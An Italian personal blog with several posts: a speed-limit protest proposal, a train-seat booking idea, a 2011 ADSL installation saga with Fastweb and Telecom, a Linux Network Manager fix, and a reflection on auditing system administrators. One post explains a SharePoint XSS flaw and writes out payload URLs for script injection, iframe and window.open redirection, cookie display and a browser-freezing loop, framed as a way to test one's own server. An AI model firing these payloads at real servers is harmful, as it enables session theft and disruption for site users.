Protesta bianca contro i limiti di velocità

Propongo una mobilitazione generale contro i limiti di velocità inadeguati e di conseguenza che nessuno rispetta.

L' obiettivo è sensibilizzare coloro i quali sono preposti a stabilire i limiti di velocità e spingerli a valutare meglio le loro decisioni prima di renderle legge.
Non ha senso infatti assegnare ad una strada un limite di velocità che nessuno rispetterà mai perchè troppo inferiore a quelli che sono i limiti del buon senso. Non devono fare "il compitino per casa" cercando di avere meno responsabilità possibili, ma devono regolare il traffico facendo si che gli utenti della strada arrivino a destinazione in sicurezza, il più velocemente possibile e inquinando il meno possibile.
Una macchina molto lenta è una macchina che crea intralcio quando non addirittura pericolo alla normale circolazione. Sappiamo inoltre che di solito il miglior rapporto tra inquinamento e strada percorsa si ha tra i 70 Km/h e i 100 Km/h. Una macchina che viaggia ai 50 Km/h spesso inquina di più di un veicolo appena più veloce.

Le modalità della protesta sono semplici. Dimostrare la scorretta assegnazione dei limiti rispettandoli tutti alla lettera, si evidenzieranno immediatamente rallentamenti eccessivi ed ingorghi.
Se ci sono i 50 Km/h facciamo si che tutti vadano ai 50 Km/h, se ci sono i 30 Km/h allora tutti ai 30 Km/h, non un chilometro di più. Non dico sempre, come però sarebbe la regola, ma almeno quando non avete urgenza o motivo di correre; quando potete permettervi di metterci cinque minuti in più per arrivare a destinazione.

I risultati che mi aspetto sono che avremo un grande impatto sulla circolazione. Costringeremo molti, se non tutti, ad andare alla nostra velocità e a rendersi conto che spesso i limiti di velocità sono esagerati e addirittura controproducenti. Immaginatevi la faccia di quello che sfanala e rosica perchè non riesce a passare sapendo che lo fate per protesta e non per inettitudine.
Immaginatevi anche gli enti che si vedranno drasticamente ridurre gli introiti di quegli autovelox infernali utilizzati maggiormente come macchine da soldi, sempre scarsi nella pubblica amministrazione, che come strumento per educare gli automobilisti ad una guida sicura e responsabile.

I tempi? Finchè le cose non cambiano. Attacchiamo un cartello sul nostro veicolo, qualunque esso sia, per avvertire chi ci segue che ci limitiamo per protesta contro i limiti e spingiamo amici e parenti a fare lo stesso. Creiamo una massa critica, più siamo più ci facciamo sentire.

Chi può prendere parte alla protesta? Tutti gli utenti della strada ovviamente. Macchine, motorini, camion, trattori e chi più ne ha più ne metta. Tutti hanno dei limiti da rispettare e tutti devono rispettarli.

Precisazioni dovute: io non sono contrario ai limiti di velocità e alla sicurezza, tutto il contrario. La sicurezza mia e di chi mi sta attorno dev'essere condizione necessaria e presupposto di tutto il resto. Credo che una volta calibrati correttamente i limiti vadano inasprite le pene per chi dovesse superarli. Credo inoltre che il limite di alcool nel sangue debba essere portato a zero per tutte le persone alla guida di veicoli, perchè anche una minima quantità altera i riflessi e la percezione di tutti anche se non ce ne rendiamo conto, non esiste persona immune agli effetti dell'alcool. Credo infine che ci voglia più rispetto degli altri in strada, a partire dall'uso degli indicatori di direzione, del rispetto delle precedenze e degli attraversamenti pedonali, degli spazi di parcheggio e in generale bisogna sempre tenere presente che non siamo gli unici utenti della strada e che il nostro comportamento non deve condizionare il prossimo.

Trenitalia, le frecce e i posti prenotati

Se possedete un abbonamento eurostar o utilizzate spesso le frecce per i vostri spostamenti facilmente conoscete il problema.
Gli abbonati non hanno il posto prenotato sul treno, semplicemente si siedono dove trovano libero. Non c'è modo per loro di sapere se il posto da loro occupato sia già prenotato, perchè i posti possono essere prenotati fino all'ultimo momento.
Può capitare quindi che si presenti chi ha prenotato il posto e lo reclami, e l'abbonato è costretto ad alzarsi e a cambiar di posto rischiando di finire in un altro già prenotato, e così via.
Sembra impossibile che nessuno abbia pensato ad una soluzione quasi imbarazzante nella sua semplicità. Se i posti nella carrozza vanno da (butto numeri a caso) 1 a 100, basterebbe prenotare per ultimi i posti da 80 a 100. In questo caso tutti i posti potrebbero essere prenotati ma l'abbonato tenderà a sedersi su questi ultimi e, nel caso in cui anche questi fossero prenotati vorrebbe dire che tutti gli altri sono già prenotati e dovrà viaggiare in piedi, perchè l'abbonamento non ha la garanzia del posto.

Telecom, Fastweb e i predatori dell'ADSL perduta

L'8 Maggio mi sono sposato e contestualmente ho cambiato casa. Dopo i festeggiamenti ed il viaggio di nozze decido di richiedere l'attivazione di una linea ADSL nella nuova casa. Analizzo le offerte del mercato e decido che l'offerta Joy di Fastweb è quella che più corrisponde alle mie esigenze, chiamo quindi il call center per richiedere il servizio. Correva il 14 Giugno 2011.
Al telefono il gentile operatore mi guida per la stipula del contratto, quando incappiamo in un problema, il primo di una lunga serie. La via dove ora abito non esiste sul suo programma perchè è una via molto nuova, di conseguenza non può verificare se il servizio sia o meno disponibile nella mia zona. Disposto a tutto per conquistare un nuovo cliente, il solerte operatore individua una via accanto alla mia, e verifica che l'ADSL c'è. Si può fare! Procediamo con le formalità, ringrazio per la gentilezza e la disponibilità e saluto.
Il giorno dopo in ufficio apro le email di pervenuta richiesta e mi accorgo che il mio indirizzo è sbagliato e riporta la via accanto alla mia usata a fini di verifica. Veloce telefono per correggere l'errore e chiedo che mi vengano rispedite le carte da firmare, mi confermano la correzione e mi dicono che provvederanno al più presto a rispedire i documenti. Il 17, due giorni dopo, ricevo una email che conferma la variazione di indirizzo. Niente documenti corretti allegati. Poi più niente.
Il 23 Giugno decido che è ora di chiedere nuovamente le carte, ma questa volta per iscritto. Vado quindi sul modulo di assistenza online, compilo con i miei dati e chiedo che mi vengano spediti i documenti corretti. La sera stessa mi chiama una gentile operatrice, le rispiego il problema, mi conferma che l'indirizzo è già stato cambiato e che segnala di rispedire i documenti.
Passano i giorni, nel frattempo una mattina, a sorpresa, mi chiama un tecnico di Telecom: sono davanti a casa mia per attivare l'ADSL. Peccato che non fossi stato avvisato per cui a casa non c'è nessuno, siamo tutti al lavoro. Nessun problema, mi rispondono, intanto fanno tutte le operazioni preliminari e poi mi richiameranno per concordare una data di intervento. E così fu, la sera stessa mi accordo con un altro tecnico che verrà a casa mia per attivare la linea.
Arriva il giorno, nel frattempo si è fatto Agosto, e il tecnico si presenta puntuale. In piedi in mezzo alla via di casa mia cerca disperatamente la centralina di zona che avrebbero dovuto installare i tecnici della volta precedente. La centralina nuova non è stata installata. Verifica la distanza da quella più vicina e decide che deve proprio chiederne un'altra. Quella già presente infatti sarebbe troppo distante, quindi si verificherebbe una grossa perdita di segnale, e troppo piccola per soddisfare le richieste di tutta la zona. Invia l'email di richiesta davanti a me, saluta e sparisce nella calda luce di un ormai basso tramonto estivo.
Vado in ferie, e in quei giorni Telecom mi avvisa che la nuova centralina di zona è stata installata. Di lì a breve mi chiama un'operatrice Fastweb per chiedermi se avessi già provato a collegare il router che mi avevano consegnato la mattina. Faccio notare che, essendo in spiaggia (con tanto di rumore delle onde in sottofondo) a 200 Km di distanza, il router non è stato consegnato al sottoscritto, ne a mia moglie che è in vacanza con me. E che comunque non avrei saputo dove collegarlo visto che la spina del telefono in casa Telecom non me l'ha ancora messa. La gentile operatrice riattacca con la scusa che magari il router è stato ritirato da qualcuno in casa mia (i ladri?) oppure da qualche vicino. Rimaniamo daccordo che ci saremmo sentiti se al mio ritorno non avessi trovato il pacco.
Al mio ritorno del router neanche l'ombra, mentre trovo nella cassetta delle lettere un plico di carte, la copia del contratto da rispedire firmato con il mio indirizzo ancora sbagliato nonostante le numerose segnalazioni. Prendo in mano il telefono, deciso a raccontare la mia storia e speranzoso di trovare aiuto e conforto. Parto dal router. L'operatrice sfoglia i documenti e mi dice che è stato consegnato ad un certo signor Matteo. Le rispondo che se quel Matteo ero io quella firma è falsa, se è qualcun altro che mi dica il cognome che gli vado a chiedere di restituirmi il mio router. Ha firmato solo col nome, non si sa altro. Devo dedurre che il mio router è stato rubato. Me ne spediranno un altro. L'operatrice sta per riattaccare, ma veloce gli spiego che se anche avessi il router non potrei attaccarlo da nessuna parte visto che Telecom non mi ha ancora portato la presa del telefono in casa. Lei capisce il problema e invia un sollecito a Telecom per velocizzare i tempi.
Sta per attaccare di nuovo quando le spiego l'ultimo dei miei problemi, il problema delle carte spedite con l'indirizzo sbagliato. Lei mi dice che la firma serve solo per l'anagrafica, ma le rispondo che non sono disposto a firmare carte dove richiedo l'attivazione di una linea telefonica a casa di qualcun altro perchè in caso sbagliassero ad attivarla la colpa sarebbe mia. Mandatemi le carte corrette e io le firmo, altrimenti niente. Lei segnala anche questo problema, ma non ho più molta fiducia che si risolva.
Passa qualche giorno, sono in bagno a farmi la barba quando suona il telefono (il cellulare, che credavate??). Una gentile signorina di Telecom ha una segnalazione guasto a mio nome e mi chiede gentilmente se ho tempo di fare qualche prova: provi a staccare e riattaccare il router. Rimango di sale. Le rispondo che se anche avessi un router, cosa che ancora non ho, non saprei dove attaccar(me)lo visto che non mi hanno ancora messo la presa telefonica. Strano, mi risponde, e come mai allora pago le bollette? Io non pago le bollette, le ribatto, e la centralina di zona l'avete installata da poco, come pensate che potesse essere collegata casa mia prima? Capisce il problema, segnala e riattacca. Sono i primi giorni di Settembre.
Il giorno dopo mi chiama un tecnico Telecom chiedendomi quale fosse il problema. Il problema è che non ho la presa del telefono. Ma che contratto avevi prima, mi chiede. Rispondo che fino a tre mesi fa, giorno in cui ho chiesto la linea, in quella casa non c'erano neanche i pavimenti. E come mai allora paghi le bollette? Io non pago nessuna bolletta ancora, non mi avete ancora dato il servizio!! Il tecnico proprio non capisce, decide così di fare una verifica e di richiamarmi. Mi richiama e mi chiede quando può venire. Gli rispondo che la mattina dopo mia moglie è a casa, e domando quanto tempo ci vorrà a fare il lavoro. La risposta mi lascia basito: vengo solo per capire la situazione, non capisco perchè non vada la linea. Cosa c'è da capire, replico, non ho la presa del telefono. E' una casa nuova, dovete tirare il cavo del telefono dalla nuova centralina di zona a casa mia, è molto semplice. Ma lui non vuole sentire ragioni e il giorno dopo si presenta a casa mia, pone le stesse domande a mia moglie, che risponde con le mie stesse parole, e, fulminato sulla via di Damasco, se ne va sollecitando i lavori.
Sembrava ormai prossimo l'avvento dell'ADSL, quando un giorno mi chiama sul cellulare un nuovo tecnico Telecom chiedendomi le stesse cose del precedente. Ormai esasperato gli chiedo di venire a casa quando ci sono anch'io in modo da analizzare il problema insieme. Appena arrivato metto in chiaro che quella è la quinta uscita che fanno e che il problema è sempre lo stesso. Il tecnico si mette in mezzo alla strada e cerca la nuova centralina di zona (deja vu) installata dall'altra squadra. Non si trova! Si mette così a chiamare i colleghi e viene a sapere che nessuna centralina è stata installata recentemente nella mia zona, nonostante la richiesta del suo collega e la conferma via telefono di installazione eseguita. Shockato gli chiedo il da farsi. Decide di collegare casa mia alla centralina che l'altro tecnico aveva giudicato troppo lontana, preventivando almeno tre ore di lavoro per alzare tutti i tombini della via per portare il cavo. Ci accordiamo per il giorno.
Quel giorno è oggi, mercoledì 14 Settembre alle 17.30. Mi sveglio emozionato come il primo giorno di scuola. Ma alle 8 mi suona il telefono, sono i tecnici telecom che vogliono fare il lavoro, peccato che l'appuntamento fosse di pomeriggio e che io sia a lavorare. La ditta (subappaltata da Telecom) mi dice che le sembra strano che l'appuntamento fosse alle 17.30 perchè loro alle 17.00 finiscono. Ci accordiamo comunque per vederci alle 17.30. Manca un'ora, vediamo se stasera riuscirò a twittare la buona riuscita dal mio pc collegato alla mia nuova ADSL. Ah no ma che dico, non ci riuscirò, mi manca il router che sto ancora aspettando.

-- Aggiornamento 15/09/2011 --

Ieri quando sono arrivato a casa i tecnici avevano già tirato il cavo fino a casa. Mancava solo di farlo entrare e attaccare la spina. Dopo due ore di lavoro però il tecnico non era ancora riuscito, nonostante il poveretto sia stato così gentile da fermarsi ben oltre il suo orario di lavoro. Rimaniamo comunque daccordo per riprovarci venerdì.
Stamattina ricevo una telefonata da un'operatrice di Fastweb che mi chiede se la linea in casa sia stata attivata. Le spiego com'è andata ieri, e vengo a sapere che se non riescono loro a far passare il cavo dal corrugato dovrò chiamare degli elettricisti a mie spese. Rispondo che se venerdì non andrà tutto a buon fine cambierò compagnia.
Le chiedo notizie del router che sto aspettando, lei mi dice che finchè la linea non sarà attiva non me ne manderanno un altro per evitare di doverlo rimandare indietro in caso decidessi di non proseguire. Infine chiedo notizie delle carte corrette che sto aspettando da Giugno, e finalmente trovo il primo operatore che mi dice che non è possibile avere le carte corrette perchè una volta censito con un indirizzo resta quello e non si può cancellare. Mi chiede pertanto di mandarle le carte firmate. Ovviamente le rispondo che non firmo carte dove richiedo l'attivazione di una linea a casa di qualcun altro, e lei mi consiglia di correggere l'indirizzo sul contratto e di rispedirlo firmate. Deciderò venerdì, in base a come andranno le cose, se tutto andrà bene farò come dice altrimenti questi tre mesi saranno stati solo un brutto sogno. Non so più a cosa pensare.

-- Aggiornamento del 16/09/2011 --

Il cavo stamattina è stato tirato, ho la spina del telefono a casa. Mi ha anche chiamato Telecom per chiedere conferma del funzionamento dell'impianto. Forse le cose volgono a buon fine.

-- Aggiornamento del 27/09/2011 --

HO INTERNET! Dopo appena 3 mesi e 13 giorni la mia linea ADSL a casa è finalmente attiva e funzionante! Non l'ho ancora verificato, ma mia moglie per telefono mi ha detto che è tutto ok. Non vedo l'ora di tornare a casa per provare il nuovo giochino.
C'è una sola cosa che mi ronza in testa dopo aver ripensato a tutta la vicenda e che mi infastidisce non poco. Il falegname di George Clooney che dice sorridente "veloci come fastweb!".

-- Aggiornamento del 19/10/2011 -

Rileggendo quello che ho scritto il 27/09 mi rendo conto di aver cantato vittoria troppo presto. Domenica 2 Ottobre sono davanti al computer quando la connessione comincia ad andare a singhiozzo, a tratti non si aprivano nemmeno le pagine web. Installo quindi Ne.Me.Sys., il programma di Agcom che permette di avere un report ufficiale delle prestazioni della propria ADSL. L'offerta J@y di Fastweb ha un downstream di 20 Mbit, e sul sito, secondo le nuove norme sulla trasparenza, dichiarano che la velocità minima garantita è di 10.2 Mbit. Dopo un paio di giorni di lavoro, Ne.Me.Sys. mi da i risultati: 2.8 Mbit medi in downstream, ben inferiore quindi alla minima. Seguo le istruzioni di Agcom per reclamare ciò che pago, preparo ed invio un fax a Fastweb con la documentazione avvisando che ripeterò il test di lì a trenta giorni e che se dovesse nuovamente fallire provvederò a recedere da contratto senza penali per loro inadempienza contrattuale.
Fast forward ad oggi, mi chiama un tecnico Telecom per chiedermi quale sia il problema alla mia ADSL. Gli faccio una breve panoramica e mi risponde che casa mia è troppo lontana dalla centrale telecom, e che quindi più di così la linea non riesce a fare. Gli rispondo che capisco il suo problema, ma io il costo lo pago intero e quindi pretendo di avere il servizio che pago. Mette giù, capendo pienamente il problema. I trenta giorni scadono il 4 Novembre, non ho molta fiducia che lo risolvano, rifarò il test con Ne.Me.Sys. e poi prenderò una decisione.

-- Aggiornamento del 25/10/2011 --

Ho vinto la mia battaglia contro Fastweb! Oggi mi chiama un commerciale, che, fatte le presentazioni, comincia a spiegarmi che casa mia è troppo lontana dalla centrale e che quindi non potrei mai arrivare alla velocità di 20 Mbit. Non solo, probabilmente per errore gli sfugge di dirmi che la centrale di Tezze sul Brenta a cui sono collegato è una centrale che viaggia al massimo a 7 Mbit.
Gli faccio notare che sul sito non è scritto che la velocità massima nella mia zona è 7 Mbit, e che anche l'operatore con cui ho stipulato il contratto mi ha sempre parlato di 20 Mbit. Se avessi saputo che al più, pur abitando vicino alla centrale, sarei potuto arrivare massimo a 7 probabilmente avrei fatto il contratto con qualche altro fornitore, magari uno WiMax, più prestante fuori dalle zone abitate. Oltretutto non trovo giusto che se posso avere al massimo 7 Mbit mi facciano comunque pagare come chi ne può usare 20. Aggiungo anche che venire a sapere dopo 3 mesi e 14 giorni di questi problemi mi fa molto arrabbiare e che non ritengo il loro un comportamento serio.
Dopo aver per un po' sostenuto la tesi del limite fisico con scarsi risultati scende a compromessi e mi fa La Proposta. Due mesi di ADSL gratis, poi a Settembre 2012 quando scade l'offerta J@y a 20 euro al mese, invece di pagarne 32 mi propone di continuare a pagarne 20. Gli rispondo di darmi intanto i 2 mesi gratis, poi a Settembre ci risentiamo. Epic win! =D

Network Manager sparito

Trovatomi davanti ad un fastidioso bug con wicd che non mi permetteva di cambiare agilmente subnet durante i test, ho deciso di tornare al vecchio network manager, con cui avevo litigato tempo fa.
Una volta ripristinato mi son trovato davanti a questo fastidioso problema: all'avvio della sessione utente non trovavo l'icona di nm-applet, l'applet di network manager, nell'area di notifica.
A nulla sono valsi i tentativi di riavviare l'applet, ad ogni kill e riavvio l'icona non riappariva, mi accordo però che allacciandomi da terminale ad una rete magicamente l'icona riappariva con il collegamento effettuato.
Dopo millle tentativi e ricerche su google ho capito che il problema risiedeva nella configurazione di eth0 modificata a mano dal sottoscritto nel file /etc/network/interfaces che probabilmente andava in conflitto con il despota network manager.
Ho proceduto quindi in questo modo:

Prendo i diritti di amministratore

sudo -i

Fermo il servizio di network manager e disattivo la scheda di rete eth0 che dava problemi

stop network-manager
ip link set eth0 down

Modifico il file delle interfacce di rete commentando con un # tutto quello che riguarda eth0

vim /etc/network/interfaces

Riavvio i servizi di rete

ip link set eth0 up
start network-manager

Riavvio il sistema per verificare che ora tutto funzioni correttamente

reboot

Tanti auguri a me!

Tre anni di blog.

Vulnerabilità cross-site scripting per Share Point

Come descritto da Mammona Microsoft nel security advisory 983438, Share Point risulta vulnerabile ad un attacco cross-site scripting (XSS).
Il problema risiederebbe in una variabile, cid0, che non viene ripulita dai caratteri speciali permettendo così di iniettare codice arbitrario nelle pagine del sito. Così facendo si espongono gli utenti del sito a diversi pericoli:

• furti di dati tra cui i cookie di autenticazione al sito stesso: tramite javascript è possibile andare a leggere il document.cookie e passarlo, per esempio come parametro codificato tramite il comando window.open, ad una pagina creata ad-hoc per registrare i dati ricevuti.
• esecuzione di software non autorizzato: incapsulando un iframe nella pagina o sempre con il comando window.open è possibile indirizzare gli utenti verso siti malevoli che installeranno ed eseguiranno software non autorizzato sul pc dell'utente.
  
• attacchi denial of service: è possibile creare script che bloccano il browser dell'utente.
• altro: l'unico limite è la fantasia.
  

Per testare se il vostro server SharePoint è vulnerabile potete usare questa stringa:

http://mioserver/_layouts/help.aspx?cid0=MS.WSS.manifest.xm%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&tid=X

ovviamente sostituendo "mioserver" con l'indirizzo del vostro server. Nel caso il vostro server sia vulnerabile si aprirà un popup con scritto "XSS".
Analizzando l'url vediamo come il parametro cid0 venga forzato tramite un carattere nullo () a ricevere un pezzo di javascript codificato in ascii racchiuso dai tag <script> e </script> a loro volta codificati.
Un esempio di come iniettare una pagina esterna al sito, in questo caso Google, tramite un iframe potrebbe essere questo:

http://mioserver/_layouts/help.aspx?cid0=MS.WSS.manifest.xml%3Ciframe%20src=%22http://www.google.it%22%3E%3C/iframe%3E%&tid=X

Se invece vogliamo proprio aprire una nuova finestra possiamo usare il comando window.open in questo modo:

http://mioserver/_layouts/help.aspx?cid0=MS.WSS.manifest.xml%3Cscript%3Ewindow.open('http://www.google.it')%3C/script%3E&tid=X

per mostrare i cookie di sessione:

http://mioserver/_layouts/help.aspx?cid0=MS.WSS.manifest.xml%3Cscript%3Ealert(document.cookie)%3C/script%3E&tid=X

ed infine per creare un bel denial of service che costringerà a killare il processo del browser:

http://mioserver/_layouts/help.aspx?cid0=MS.WSS.manifest.xml%3Cscript%3Ewhile(1)%20alert('Owned')%3C/script%3E&tid=X

Qualcuno ha addirittura pensato a vere e proprie backdoor in javascript da passare come sorgente di script tramite XSS per comandare da remoto i pc caduti vittima di questi attacchi. Non mi sono sincerato se la cosa funzioni sul serio o meno, il mio scopo è rendere l'idea di quante cose si possano fare avendo la possibilità di passare codice arbitrario alle pagine web.
Attualmente per sistemare questa falla di sicurezza non esistono patch. I programmatori devono sincerarsi di validare tutte le possibili fonti di input da parte dell'utente sostituendo o rendendo innocui tramite comandi di escape i caratteri speciali.

De Informatica Securitate

Dopo quasi un anno dall'ultimo post e a seguito del rinnovo del dominio mi trovo a scrivere questo breve articoletto che avevo in mente da un po' di tempo.

Già duemila anni fa due personaggi avevano trattato l'argomento sicurezza nei loro scritti. Certo non si sarebbero mai immaginati che quegli stessi princìpi molto tempo dopo si sarebbero potuti applicare a reti di calcolatori, ma loro ci avevano pensato sul piano logico ed erano giunti a delle conclusioni. Platone nell'opera La Repubblica afferma:

Nempe ridiculum esset, custode indigere custodem.

che tradotto vuol dire

Ovviamente è ridicolo, che un custode debba essere custodito.

Circa quattrocento anni dopo Giovenale nelle sue Satire si pone una domanda dalle sfumature simili:

Pone seram, cohibe, sed quis custodiet ipsos custodes?

che vuol dire più o meno

Spranga la porta, chiudi, ma chi sorveglierà gli stessi custodi?

Ora facciamo un salto avanti di duemila anni. E' il 27 Novembre 2008 e troviamo un provvedimento del Garante della Privacy che riguarda gli amministratori di sistema, che hanno un ruolo di custodi dei server che amministrano, il quale prescrive che i log, cioè i registri dei server che tengono traccia degli accessi ai server e delle operazioni svolte da chi accede agli stessi, abbiano caratteristiche di completezza, inalterabilità e che vi sia possibilità di verifica dell'integrità stessa dei dati. Impone cioè all'azienda di diffidare degli amministratori controllando il loro operato senza che l'amministratore possa modificare i registri per inquinare le prove delle sue operazioni.

Chi ha un minimo di conoscenze sull'argomento sa che i sistemi informatici sono gerarchici e al vertice della piramide del potere c'è l'amministratore di sistema, che ha poteri assoluti sui server in cui opera. Almeno un amministratore deve esserci. Sempre.

Come facciamo allora a fare in modo di controllare l'amministratore? Le tecniche sono diverse. Possiamo creare l'hash dei log, una sorta di impronta digitale univoca che assicura che il log stesso non sia stato modificato dopo la scrittura. Ma a chi affidiamo l'archivio degli hash per eventuali future verifiche? Dobbiamo ricorrere necessariamente ad un altro amministratore, se non allo stesso che viene controllato, ritrovandoci così al punto di partenza. E chi ci dice che i log non siano stati modificati prima della scrittura sul disco, magari a più basso livello, o che non siano stati modificati gli hash stessi in modo da autenticare log alterati? In fondo abbiamo detto che l'amministratore ha potere assoluto sui suoi server.

La soluzione a questo problema non c'è mai stata e non c'è tuttora, per quanto vengano vendute soluzioni chiavi in mano a volte anche molto costose. Questo provvedimento del garante sebbene possa essere trovato utile da qualcuno sul piano teorico è assolutamente inapplicabile a livello pratico, e non serve ad altro che ad impegnare in maniera poco proficua il tempo degli amministratori e i fondi delle aziende che potrebbero essere impegnati più produttivamente per fare formazione, ricerca e sviluppo, o per implementare altre aree che sono le prime ad essere trascurate in un'epoca in cui il tempo ed i fondi scarseggiano.